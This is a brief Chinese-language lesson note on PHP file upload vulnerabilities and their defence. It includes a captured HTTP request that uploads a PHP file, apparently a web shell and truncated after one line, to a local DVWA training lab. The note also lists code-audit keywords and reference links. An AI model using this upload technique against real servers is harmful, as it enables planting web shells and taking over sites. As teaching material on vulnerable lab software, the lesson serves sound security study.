第十二课 php文件上传漏洞和代码防御

挖掘上传漏洞

常见上传函数

$_FILES  move_uploaded_file等函数

搜索关键字

$_FILES  move_uploaded_file

 

如何防止上传漏洞

自定义文件扩展名和路径

POST /dvwa/vulnerabilities/upload/ HTTP/1.1

Host: 127.0.0.1

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.6 Safari/533.2 TheWorld

Referer: http://127.0.0.1/dvwa/vulnerabilities/upload/

Content-Length: 44257

Cache-Control: max-age=0

Origin: http://127.0.0.1

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycz35Z3smbBOMVWCB

Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

Cookie: security=low; PHPSESSID=af10db443bb4de0a9ac56314d445a4de

 

------WebKitFormBoundarycz35Z3smbBOMVWCB

Content-Disposition: form-data; name="MAX_FILE_SIZE"

 

100000

------WebKitFormBoundarycz35Z3smbBOMVWCB

Content-Disposition: form-data; name="uploaded"; filename="class1.php"

Content-Type: application/octet-stream

 

<?php error_reporting(7); ob_start();

课后了解

https://www.owasp.org/index.php/Unrestricted_File_Upload

http://www.acunetix.com/websitesecurity/upload-forms-threat.htm

http://sebug.net/?s1=s&w=上传漏洞

http://www.fiddler2.com/Fiddler2/version.asp